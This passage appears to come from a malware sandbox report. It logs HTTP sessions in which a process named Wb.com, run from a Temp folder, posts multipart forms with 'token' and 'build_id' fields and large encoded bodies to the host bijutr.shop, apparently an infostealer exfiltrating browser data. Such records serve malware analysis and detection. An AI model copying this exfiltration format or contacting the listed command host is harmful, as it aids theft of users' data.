                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:56 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      19192.168.2.649849188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:55 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----E37YCBIEU37YUA1689HV
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:55 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E37YCBIEU37YUA1689HVCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:56 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      20192.168.2.649875188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:02 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EK689ZM79H47YMGD2VA1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 3165
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:02 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EK689ZM79H47YMGD2VA1Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:03 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      21192.168.2.649888188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----MGD2NY5P8Q9RQIMYUSJE
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 207993
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------MGD2NY5P8Q9RQIMYUSJEContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------MGD2NY5P8Q9RQIMYUSJEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MGD2NY5P8Q9RQIMYUSJECont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
